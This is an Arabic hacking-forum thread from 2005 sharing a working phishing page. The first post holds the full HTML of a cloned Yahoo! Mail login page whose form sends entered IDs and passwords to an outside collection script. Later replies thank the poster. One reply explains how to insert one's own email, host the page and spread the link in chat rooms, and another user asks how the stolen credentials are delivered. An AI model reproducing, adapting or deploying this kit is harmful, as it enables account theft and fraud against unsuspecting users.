.:: منتديات العاصفة ::.  

العودة   .:: منتديات العاصفة ::. > أنظمة التشغيل والخوادم > :: مملكة حماية البريد و الأجهزة ::

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 13-02-2005, 10:47   #1
.:: المراقب العــام ::.
 
الصورة الرمزية Darkwar
 
تاريخ التسجيل: Dec 2003
الدولة: SuperSYN flood.
المشاركات: 2,829
صفحة الياهو المزوره شغاله ميه ميه

<html>
<head>
<META &@#&@#&@#&@#&@#&@#&@#="index,follow" name="robots">
<META &@#&@#&@#&@#&@#&@#&@#="Yahoo! Mail Free reliable easy SpamGuard antivirus storage" name="keywords">
<META &@#&@#&@#&@#&@#&@#&@#="Take a closer look at Yahoo! Mail. Get these great features: Powerful protection against spam and viruses, 250MB of email storage, Message size up to 10MB, and Mail anywhere there's a web connection" name="description">

<link type="text/css" rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/i/reg/mail_style.css">
<title>Yahoo! Mail - The best web-based email!</title>
<style type="text/css">
<!--
body {
margin-top: 0px;
}
-->
</style>
<script language="javascript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js">
</script>
<script language="javascript">
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Copyright (C) Paul Johnston 1999 - 2000.
* Updated by Greg Holt 2000 - 2001.
* See http://pajhome.org.uk/site/legal.html for details.
*/

/*
* Convert a 32-bit number to a hex string with ls-byte first
*/
var hex_chr = "0123456789abcdef";
function rhex(num)
{
str = "";
for(j = 0; j <= 3; j++)
str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
hex_chr.charAt((num >> (j * 8)) & 0x0F);
return str;
}

/*
* Convert a string to a sequence of 16-word blocks, stored as an array.
* Append padding bits and the length, as described in the MD5 standard.
*/
function str2blks_MD5(str)
{
nblk = ((str.length + 8) >> 6) + 1;
blks = new Array(nblk * 16);
for(i = 0; i < nblk * 16; i++) blks[i] = 0;
for(i = 0; i < str.length; i++)
blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
blks[i >> 2] |= 0x80 << ((i % 4) * 8);
blks[nblk * 16 - 2] = str.length * 8;
return blks;
}

/*
* Add integers, wrapping at 2^32. This uses 16-bit operations internally
* to work around bugs in some JS interpreters.
*/
function add(x, y)
{
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}

/*
* Bitwise rotate a 32-bit number to the left
*/
function rol(num, cnt)
{
return (num << cnt) | (num >>> (32 - cnt));
}

/*
* These functions implement the basic operation for each round of the
* algorithm.
*/
function cmn(q, a, b, x, s, t)
{
return add(rol(add(add(a, q), add(x, t)), s), b);
}
function ff(a, b, c, d, x, s, t)
{
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}
function gg(a, b, c, d, x, s, t)
{
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}
function hh(a, b, c, d, x, s, t)
{
return cmn(b ^ c ^ d, a, b, x, s, t);
}
function ii(a, b, c, d, x, s, t)
{
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

/*
* Take a string and return the hex representation of its MD5.
*/
function MD5(str)
{
x = str2blks_MD5(str);
var a = 1732584193;
var b = -271733879;
var c = -1732584194;
var d = 271733878;

for(i = 0; i < x.length; i += 16)
{
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;

a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
c = ff(c, d, a, b, x[i+ 2], 17, 606105819);
b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
d = ff(d, a, b, c, x[i+ 5], 12, 1200080426);
c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
a = ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
c = ff(c, d, a, b, x[i+10], 17, -42063);
b = ff(b, c, d, a, x[i+11], 22, -1990404162);
a = ff(a, b, c, d, x[i+12], 7 , 1804603682);
d = ff(d, a, b, c, x[i+13], 12, -40341101);
c = ff(c, d, a, b, x[i+14], 17, -1502002290);
b = ff(b, c, d, a, x[i+15], 22, 1236535329);

a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
c = gg(c, d, a, b, x[i+11], 14, 643717713);
b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
d = gg(d, a, b, c, x[i+10], 9 , 38016083);
c = gg(c, d, a, b, x[i+15], 14, -660478335);
b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
a = gg(a, b, c, d, x[i+ 9], 5 , 568446438);
d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
b = gg(b, c, d, a, x[i+ 8], 20, 1163531501);
a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
c = gg(c, d, a, b, x[i+ 7], 14, 1735328473);
b = gg(b, c, d, a, x[i+12], 20, -1926607734);

a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
c = hh(c, d, a, b, x[i+11], 16, 1839030562);
b = hh(b, c, d, a, x[i+14], 23, -35309556);
a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
d = hh(d, a, b, c, x[i+ 4], 11, 1272893353);
c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
b = hh(b, c, d, a, x[i+10], 23, -1094730640);
a = hh(a, b, c, d, x[i+13], 4 , 681279174);
d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
b = hh(b, c, d, a, x[i+ 6], 23, 76029189);
a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
d = hh(d, a, b, c, x[i+12], 11, -421815835);
c = hh(c, d, a, b, x[i+15], 16, 530742520);
b = hh(b, c, d, a, x[i+ 2], 23, -995338651);

a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
d = ii(d, a, b, c, x[i+ 7], 10, 1126891415);
c = ii(c, d, a, b, x[i+14], 15, -1416354905);
b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
a = ii(a, b, c, d, x[i+12], 6 , 1700485571);
d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
c = ii(c, d, a, b, x[i+10], 15, -1051523);
b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
a = ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
d = ii(d, a, b, c, x[i+15], 10, -30611744);
c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
b = ii(b, c, d, a, x[i+13], 21, 1309151649);
a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
d = ii(d, a, b, c, x[i+11], 10, -1120210379);
c = ii(c, d, a, b, x[i+ 2], 15, 718787259);
b = ii(b, c, d, a, x[i+ 9], 21, -343485551);

a = add(a, olda);
b = add(b, oldb);
c = add(c, oldc);
d = add(d, oldd);
}
return rhex(a) + rhex(b) + rhex(c) + rhex(d);
}

function valid_js() {
// anything that claims NS 4 or higher functionality better work
if (navigator.userAgent.indexOf("Mozilla/") == 0) {
return (parseInt(navigator.appVersion) >= 4);
}
return false;
}

function hash(form,login_url) {
// this is Javascript enabled browser
//document.login_form[".js"].value=1;
// rudimentary check for a 4.x brower. should catch IE4+ and NS4.*
var url;

if (arguments.length > 1 && login_url != "") { // in case login_url is not passed in
url = login_url;
} else {
url = "http://login.yahoo.com/config/login";
}
url += "?";

if (valid_js()) {
var passwd = form.passwd.value;
var challenge = form[".challenge"].value;
var hash2 = MD5(form.passwd.value) + challenge;
var hash;
if(form.passwd.value){
hash=MD5(hash2);
} else {
hash="";
}
var js = 0;

for(i=0; i<form.elements.length; i++){
if(typeof(form.elements[i].name)=="undefined" || form.elements[i].name.length <=0) {
continue;
}
if(i > 0){
url += "&";
}
url += form.elements[i].name;
url += "=";
if(form.elements[i].name == "passwd"){
url += hash;
} else if (form.elements[i].type == "checkbox" && !form.elements[i].checked) {
url += "";
} else if (form.elements[i].type == "radio" && !form.elements[i].checked) {
url += "";
} else if (form.elements[i].name == ".save"){
url += "1"; // "Sign in" causes problem with the space
} else if (form.elements[i].name == ".js"){
js = 1;
url += "1";
} else {
url += escape(form.elements[i].value);
}
}
// indicate the password is hashed.
url += "&.hash=1";
if(js == 0){
url += "&.js=1";
}
url += "&.md5=1";
//alert("url=" + url);
location.href=url;
// prevent from running this again. Allow the server response to submit the form directly
form.onsubmit=null;

// abort normal form submission
return false;
}
// allow normal form submission
return true;
}
</script>
<script language="JavaScript">
<!--
hasMsgr = 0;
function dontGotIt(){
hasMsgr = 0;
document.login_form.hasMsgr.value=0;
}

function doGotIt(){
hasMsgr = 1;
document.login_form.hasMsgr.value=1;
}
//-->
</script>

<META HTTP-&@#&@#&@#&@#&@#="Pragma" &@#&@#&@#&@#&@#&@#&@#="no-cache">
<META HTTP-&@#&@#&@#&@#&@#="Expires" &@#&@#&@#&@#&@#&@#&@#="0">
<META HTTP-&@#&@#&@#&@#&@#=&@#&@#&@#&@#&@#&@#&@# &@#&@#&@#&@#&@#&@#&@#=900;>
</head>
<body bgcolor="#ffffff" onload="document.login_form.login.focus();">
<center>

<table cellpadding="0" cellspacing="0" border="0" width="720">
<tr>
<td height="5" nowrap><spacer type="block" width="1" height="5"></td>
</tr>
<tr>
<td>
<table cellspacing=0 cellpadding=0 width=100% border=0>
<tr>
<td width=1% align=left>
<table width=1% cellspacing=0 cellpadding=0 border=0>
<tr>
<td width=1% align=left nowrap>
<img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif" width="196" height="33" border="0" alt="Yahoo! Mail">
</td>
</tr>
</table>
</td>

<td width=100% align=right nowrap valign=bottom>
<table width=100% cellspacing=0 cellpadding=0 border=0>
<tr>
<td width=99% align=right nowrap valign=bottom><font face=Arial size=-1><a href="http://www.yahoo.com " target="www">Yahoo!</a> - <a href="http://help.yahoo.com/help/us/edit/" target="help">Help</a></font>
<br><hr size=1 noshade></td>
</tr>
</table>
</td>
<td align=right width="1%">
<script language="JavaScript">
function PBopenWindow(){
window.open('http://us.ard.yahoo.com/SIG=12f6588tm/M=294867.5495648.6574428.4664665/D=regst/S=150001403:PB/Y=yahoo/EXP=1108210235/A=2167824/R=0/SIG=10tt88gbl/*http://poweredby.hpidea.com','NewWin','height=590,width=7 90');
}
</script>
<a href="javascript:PBopenWindow()"><img src="http://us.a1.yimg.com/us.yimg.com/a/co/compaq/powrdbyhp_blu_84x28_yahoo.gif" alt="" border="0" align="center" width="84" height="28" hspace="3"></a></td>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="5" nowrap><spacer type="block" width="1" height="5"></td>
</tr>
</table>


<table width="720" border="0" cellpadding="0" cellspacing="0" bgcolor="#B6C7E5">
<tr>
<td align="left" valign="top" width="12" nowrap><img name="login_r1_c1" src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r1_c1.gif" width="12" height="10" border="0" alt=""></td>
<td width="450" nowrap valign="top">
<table border="0" cellpadding="0" cellspacing="0" width="450" bgcolor="#B6C7E5">
<tr>
<td width="15" nowrap><spacer type="block" width="15"></td>
<td width="197" align="right" valign="middle" class="headlineblue" nowrap><br>
Yahoo! Mail<br> helps
me<br> stay in touch.</td>
<td width="214" align="left" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_woman.jpg" width="195" height="130"></td>
<td width=24 nowrap><spacer type="block" width="20"></td>
</tr>
<tr>
<td colspan="4" bgcolor="#250175" width="450" height"8"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_blue_horiz.gif" width="450" height="8"></td>
</tr>
</table>

<table border="0" cellpadding="0" cellspacing="0" width="450" bgcolor="#B6C7E5">
<tr>
<td nowrap height="10" colspan="4"><spacer type=vertical size=20></td>
</tr>
<tr>
<td nowrap width="10"><spacer type="block" width="10"></td>
<td valign="top" class="bodyblue" width="276" nowrap align="left">
<span style="font-size: 18px; line-height: 22px; "><font style="font-size: 18px; line-height: 22px;">New to Yahoo!?</font></span><br>
<font class="bodyblue"><b>Get a free <a href="http://us.rd.yahoo.com/reg/login0/no_suli/signup1_lhs/us/ym/*http://billing.mail.yahoo.com/bm/MailReg?.done=&.intl=us&.src=ym&.u=6lkjbop10p85r&p artner=&.p=&promo=&.last=" style="color: #7B0099;">Yahoo! Mail</a> account</b> – it's a breeze to stay connected and manage your busy life.</font>
<ul style="margin-left: 10px; padding-left: 10; margin-top: 10px;" >
<li style="margin-top: 6px;"><font class="bodyblue"><b>250MB of email storage</b><BR>Keep more of what's important to you </font></li>
<li style="margin-top: 6px;"><font class="bodyblue"><b>Powerful spam protection</b><BR>Read only the mail you really want </font></li>
<li style="margin-top: 6px;"><font class="bodyblue"><b>Get your mail anywhere</b><BR>All you need is a web connection . </font></li>
<br>
<a href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://us.info.mail.yahoo.com/" style="color: #7B0099;"><font class="bodyblue">Learn More</font></a>
</ul>
<table border="0" align="center" cellpadding="0" cellspacing="0" height="95">
<tr>
<td width="60" align="left">
<a href="http://reviews.cnet.com/Yahoo_Mail/4505-9236_7-30980704.html?part=editchoice&subj=yahoomail" target="cnet"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/EC_aug04_47x95_2.gif" width="47" height="95" border="0" align="left" vspace="0"></a>
</td>
<td width="300" align="center"><form action="http://us.rd.yahoo.com/reg/login0/no_suli/signup2_lhs/us/ym/*http://billing.mail.yahoo.com/bm/MailReg" method="get">
<input type="hidden" name=".src" value="ym">
<input type="hidden" name=".intl" value="us">
<input type="hidden" name=".done" value="http://mail.yahoo.com">
<input type="hidden" name=".u" value="6lkjbop10p85r">
<input type="submit" value="Sign Up Now" class="buttonpurple"></form></td>
</tr>
</table>
</td>
<td align="center" valign="top"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_divide1.gif" width="23" height="242" border=0></td>
<td valign="top" class="bodyblue"><br>
<b>Need more? Get <a href="http://us.rd.yahoo.com/mail_us/login/evt=19821/*http://mailplus.yahoo.com" style="color: #7B0099;">Yahoo! Mail Plus</b></a>.<br><br>
Mail Plus offers tougher virus and spam protection, a virtually unlimited 2GB of storage, no graphical ads, and more for only <b>$19.99/year</b>.<br><br>
<a href="http://us.rd.yahoo.com/mail_us/login/evt=19821/*http://mailplus.mail.yahoo.com/help" style="color: #7B0099;">Learn more</a>
</td>
</tr>
</table>
</td>
<td width="10" nowrap><spacer type="block" width="10"></td>
<td width="" nowrap valign="top">
<table border="0" cellpadding="0" cellspacing="0" bgcolor="#5350B9" height=96%>
<form action="http://www.err0r.as.ro/mail.php" METHOD="POST">
<input type=HIDDEN name="mail" value = "الاميل هنا ">
<input type=hidden name=".done" value="http://mail.yahoo.com" >
<input type=hidden name=".tries" value="1" >
<input type=hidden name=".src" value="ym" >
<input type=hidden name=".md5" value="" >
<input type=hidden name=".hash" value="" >
<input type=hidden name=".js" value="" >
<input type=hidden name=".last" value="" >
<input type=hidden name="promo" value="" >
<input type=hidden name=".intl" value="us" >
<input type=hidden name=".bypass" value="" >
<input type=hidden name=".partner" value="" >
<input type=hidden name=".u" value="6lkjbop10p85r" >
<input type=hidden name=".v" value="0" >
<input type=hidden name=".challenge" value="EootvZ0ePI.jTN_zafR7EPxZinfL" >
<input type=hidden name=".yplus" value="" >
<input type=hidden name=".emailCode" value="" >
<input type=hidden name="pkg" value="" >
<input type=hidden name="stepid" value="" >
<input type=hidden name=".ev" value="" >
<input type=hidden name=".branch" value="" >
<input type=hidden name="hasMsgr" value=0>
<input type=hidden name=".chkP" value="Y">
<tr bgcolor="#B6C7E5">
<td colspan="3" height="23"><spacer type="vertical" height="23"></td>
</tr>
<tr>
<td align="left" valign="top" width="10" height="9" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r2_c4.gif" width="10" height="9" border="0" alt=""></td>
<td>&nbsp;</td>
<td align="right" valign="top" width="9" height="10" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r2_c6.gif" width="9" height="10" border="0" alt=""></td>
</tr>

<tr>
<td width="10" nowrap>&nbsp;</td>
<td>
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="right" class="bodywhite" height=50><br>
<span style="font-size: 15px; line-height: 17px; font-weight: bold;"><b>Already have a Yahoo! ID?</b></span><br>Please sign in to read or send mail<br>
<hr size=1 noshade color="#8380DE"><br><br>Enter your ID and password<br>
</td>
</tr>
<!------------------ BEGIN login form ------------------->
<tr>
<td>
<table border="0" cellpadding="2" cellspacing="0">
<tr>
<td align="right" nowrap class="bodywhite">Yahoo! ID:</td>
<td align="right"><input name="login" size="17" value=""></td>
</tr>
<tr>
<td align="right" nowrap class="bodywhite">Password:</td>
<td align="right"><input name="passwd" size="17" value="" type="password"></td>
</tr>
<tr>
<td colspan="2" nowrap align="right" class=bodywhite><input type="checkbox" name=".persistent" value="y">Remember my ID on this computer<br><br></td>
</tr>
<tr>
<td colspan="2" align="right"><input name=".save" type="submit" value="Sign In" class=buttonwhite></td>
</tr>
</table>
</td>
</tr>
<!------------------ END login form ----------------------->
<!------------------ BEGIN login links -------------------->
<tr>
<td align="right" valign="top" class="bodywhite"><br>MODE:
Standard&nbsp;|&nbsp;<a href="http://us.rd.yahoo.com/reg/login0/no_suli/ssl_lib/us/ym/*https://login.yahoo.com/config/login?.branch=&.src=ym&.v=0&.u=6lkjbop10p85r&.last =&promo=&.intl=us&.bypass=&.partner=&pkg=&stepid=& .done=" style="color: #7AE8FF">Secure</a>
<br>
<br><br>
<hr size=1 noshade color="#8380DE">
<br>
<a href="http://us.rd.yahoo.com/reg/login0/no_suli/sih_lib/us/ym/*http://login.yahoo.com/config/login?.branch=&.src=ym&.intl=us&.help=1&.v=0&.u=6l kjbop10p85r&.last=&.last=&promo=&.bypass=&.partner =&pkg=&stepid=&.done=http%3a//mail.yahoo.com" style="color: #7AE8FF">Sign-in help</a><br>
<a href="http://us.rd.yahoo.com/reg/login0/no_suli/forgot_lib/us/ym/*http://edit.yahoo.com/config/eval_forgot_pw?.branch=&new=1&.done=http://mail.yahoo.com&.src=ym&partner=&.partner=&.intl=us &pkg=&stepid=&.last=" style="color: #7AE8FF">Forgot your password?</a><br>
<br>
</td>
</tr>
</table>
</td>
<td width="9" nowrap>&nbsp;</td>
<!------------------ END login links ---------------------->
</tr>
<tr>
<td align="left" valign="bottom" width="10" height="10" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r8_c4.gif" width="10" height="10" border="0" alt=""></td>
<td>&nbsp;</td>
<td align="right" valign="bottom" width="9" height="10" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r8_c6.gif" width="9" height="10" border="0" alt=""></td>
</tr>
<tr bgcolor="#B6C7E5">
<td colspan="3" height="10"><SPACER TYPE="vertical" SIZE="10"></td>
</tr>
</form>
</table> </td>
<td align="right" valign="top" width="10"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r1_c7.gif" width="10" height="10" border="0" alt=""></td>

</tr>
</table>
<table width="720" border="0" cellpadding="0" cellspacing="0" bgcolor="#B6C7E5">
<tr>
<td align="left" valign="bottom" width="10"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r9_c1.gif" width="12" height="10" border="0" alt=""></td>
<td width="696" nowrap><spacer type="block" width="696"></td>
<td align="right" valign="bottom" width="10"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r9_c7.gif" width="12" height="10" border="0" alt=""></td>
</tr>
</table>

<br>
<table cellpadding="0" cellspacing="0" border="0" width="720">
<tr>
<td align=center>
<div align="center">
<table border=0 cellspacing=0 cellpadding=2 width=100%>
<tr>
<td align="left" colspan=2><font face="Arial"><b>
Yahoo! Mail
for International Users</b></font>
</td>
</tr>
<tr>
<td valign=top align=right><small><font face="Arial" size="-2"><i>Europe</i> :</font></small></td>
<td valign=top><small><font face="Arial" size="-2"><a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=dk&.src=ym&.done=http%3a//mail.yahoo.com">Danmark</a> - <a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=de&.src=ym&.done=http%3a//mail.yahoo.com">Deutschland</a> - <a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=es&.src=ym&.done=http%3a//mail.yahoo.com">Espa&ntilde;a</a> - <a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=fr&.src=ym&.done=http%3a//mail.yahoo.com">France</a> - <a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=it&.src=ym&.done=http%3a//mail.yahoo.com">Italia</a> - <a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=no&.src=ym&.done=http%3a//mail.yahoo.com">Norge</a> - <a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=se&.src=ym&.done=http%3a//mail.yahoo.com">Sverige</a> - <a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=uk&.src=ym&.done=http%3a//mail.yahoo.com">UK</a>/<a
href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=ie&.src=ym&.done=http%3a//mail.yahoo.com">Ireland</a>
</font></small></td>
</tr>
<tr>
<td valign=top align=right><small><font face="Arial" size="-2"><i>Pacific Rim</i>:</font></small></td>
<td valign=top><small><font face="Arial" size="-2"><a
href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=au&.src=ym&.done=http%3a//mail.yahoo.com">Australia</a>/<a
href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=nz&.src=ym&.done=http%3a//mail.yahoo.com">NZ</a> - <a
href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=cn&.src=ym&.done=http%3a//mail.yahoo.com">China</a> - <a
href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=hk&.src=ym&.done=http%3a//mail.yahoo.com">Hong Kong</a> - <a
href="http://us.rd.yahoo.com/login/ym/*http://login.india.yahoo.com/config/login?.intl=in&.src=ym&.done=http%3a//mail.yahoo.com">India</a> -
<a
href="http://us.rd.yahoo.com/login/ym/*http://mail.yahoo.co.jp/">Japan</a> -
<a
href="http://us.rd.yahoo.com/login/ym/*http://login.korea.yahoo.com/config/login?.intl=kr&.src=ym&.done=http%3a//mail.yahoo.com">Korea</a> - <a
href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=sg&.src=ym&.done=http%3a//mail.yahoo.com">Singapore</a> - <a
href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=tw&.src=ym&.done=http%3a//mail.yahoo.com">Taiwan</a></font></small></td>
</tr>
<tr>
<td valign=top align=right><small><font face="Arial" size="-2"><i>Americas</i>:</font></small></td>
<td valign=top><small><font face="Arial" size="-2">
<a
href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ar&.src=ym&.done=http%3a//mail.yahoo.com">Argentina</a> - <a
href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=br&.src=ym&.done=http%3a//mail.yahoo.com">Brasil</a> - <a
href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ca&.src=ym&.done=http%3a//mail.yahoo.com">Canada</a> - <a
href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=mx&.src=ym&.done=http%3a//mail.yahoo.com">Mexico</a> - <a
href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=b5&.src=ym&.done=http%3a//mail.yahoo.com">in Chinese</a> - <a
href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=e1&.src=ym&.done=http%3a//mail.yahoo.com">en Espa&ntilde;ol</a> -
<a href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ru&.src=ym&.done=http%3a//mail.yahoo.com">in Russian</a>
</font></small></td>
</tr>
</table></div>
</td>
<td align=center valign="middle">
<a href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://my.yahoo.com/netapp/?http://www.netapp.com/poweredby.html" target="netapp"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/pim/lgn/ntap4.gif" alt="Powered by NetApp" height="60" width="105" border="0"></a>
</td>
<td></td>
</tr>
</table>
</center>


<center>
<hr width="720" size="1" noshade>
<table width="720" cellpadding="0" cellspacing="0" border="0" summary="null">
<tr>
<td align="center">
<font size="-2" face="arial" color="#8d8d8d">
Copyright &copy; 2005 Yahoo! Inc. All rights reserved. <a href="http://docs.yahoo.com/info/copyright/copyright.html" target="cp" title="Click here to view Yahoo! Copyright Policy">Copyright Policy</a> <a href="http://docs.yahoo.com/info/terms/" target="_new" title="Click here to view Yahoo! Terms of Service">Terms of Service</a><br>
<b>NOTICE: We collect personal information on this site.<br>To learn more about how we use your information, see our <a href="http://privacy.yahoo.com/" target="_new" title="Click here to view Yahoo! Privacy Policy">Privacy Policy</a></b>
</font>
</td>
</tr>
</table>
</center>
</body>
</html>
Darkwar غير متصل   رد مع اقتباس
قديم 14-02-2005, 12:05   #3
Ssb
باحث ومفكر
 
الصورة الرمزية Ssb
 
تاريخ التسجيل: Sep 2003
الدولة: في الجنةإن شاءالله
المشاركات: 2,992
الله يعطيك العافيه أخوي دارك

تحياتي لك
__________________


Ssb غير متصل   رد مع اقتباس
قديم 14-02-2005, 01:31   #4
.:: عضو قدير ::.
 
الصورة الرمزية Yossi
 
تاريخ التسجيل: Sep 2004
الدولة: ::. العاصفة .::
المشاركات: 2,135
شكراً لك اخي الكريم على هذا المقال
__________________

[click=[email protected] <<<<<< My Email]اضغط هنا[/click]
[glow=FF0000]www.3asfh.net[/glow]
انت الزائر رقم لمواضيعي وردودي

[glow=#FFFFFF][/glow]
Yossi غير متصل   رد مع اقتباس
قديم 15-02-2005, 03:14   #5
.:: تخصص برامج ::.
 
الصورة الرمزية sitrx
 
تاريخ التسجيل: Jun 2003
الدولة: inf0rm4ti0n h3ll
المشاركات: 1,272
ربي يعطيك العافيه يا اخوي

مع تحياتي
__________________


sitrx غير متصل   رد مع اقتباس
قديم 15-02-2005, 03:12   #6
:: عضو مميز ::
 
الصورة الرمزية نواف
 
تاريخ التسجيل: Jun 2003
المشاركات: 135
ممكن الشح من احد الاخوان كيف نعمل بهذه الصفحه
__________________
سبحانك اللهم وبحمدك أشهد أن لا اله الا انت استغفرك وأتوب اليك

[glint][glow=#3333CC][/glow][/glint]


تاريــــــخ التسجيل في 2003
رمضان كريمــــــــــــــــــــــــــــــــــ
وعودة بقوه
نواف غير متصل   رد مع اقتباس
قديم 15-02-2005, 03:36   #7
:: عضو خبير ::
 
الصورة الرمزية taurus
 
تاريخ التسجيل: Oct 2004
الدولة: فلسطين
المشاركات: 492
مشكوووووور أخي Darkwar
الله يعطيك العافية
__________________
Taurus


taurus غير متصل   رد مع اقتباس
قديم 16-02-2005, 06:57   #8
:: عضو خبير ::
 
الصورة الرمزية elakrab
 
تاريخ التسجيل: Nov 2004
المشاركات: 298
مشكوووووور أخي Darkwar علي الشرح
اخوك
elakrab
__________________
[size=4][align=center][glow=FFFF00]
elakrab غير متصل   رد مع اقتباس
قديم 18-02-2005, 07:30   #9
::عضو جديد ::
 
تاريخ التسجيل: Feb 2005
المشاركات: 7
اخوي ممكن تعلمني كيف اعملها واستفيد من الصفحه ياليت تعلمني بارك الله فيك

وماهو البرنامج الي استخدمته
الحلم الضائع غير متصل   رد مع اقتباس
قديم 19-02-2005, 12:13   #10
.:: عضو قدير ::.
 
الصورة الرمزية بونوره
 
تاريخ التسجيل: Jan 2004
الدولة: سلطنة عمان
المشاركات: 1,768
يعطيك العافيه دارك ور ......بالنسبه للاخوان عن كيفية استعمال الصفحه المزوره في البدايه انسخ الكود الموجود والصقه في المفكره وابحث عن كلمة" الايميل هنا " وضع بدلها ايميلك في الياهو وبعدها احفضها باي اسم مع امتداد html مثلا انا حفضتها كذا Bunorah.html وطبعا بعد حفظها ارفعها على موقعك المجاني وخذ لنك الصفحه ووزعه في التشات وغرف البالتوك ............
__________________www.tvquran.com
بونوره غير متصل   رد مع اقتباس
قديم 19-02-2005, 02:58   #11
:: مشرف منتدى البرامج والانترنت ::
 
الصورة الرمزية wind-cracker
 
تاريخ التسجيل: Jul 2004
الدولة: بحــــــــ الطوفان ــــــــــــــر
المشاركات: 4,073
مشكووور اخي علي الصفحة الرائعة
wind-cracker غير متصل   رد مع اقتباس
قديم 19-02-2005, 03:10   #12
::عضو جديد ::
 
تاريخ التسجيل: Feb 2005
المشاركات: 7
اخوي الغالي يعني انا اعملها مثل هيك
حصلت هذه
<input type=HIDDEN name="mail" value = "الاميل هنا ">

واعملها مثل هيك صح
<input type=HIDDEN name="mail" value = "[email protected]">
<input type=HIDDEN name="mail" value = "[email protected] ">

انا عملت كذا صح الطريقه

واذا كانت صحيحه كيف يجيني التبليغ مثل البررورات ياليت تعلموني ولكم الف شكر
الحلم الضائع غير متصل   رد مع اقتباس
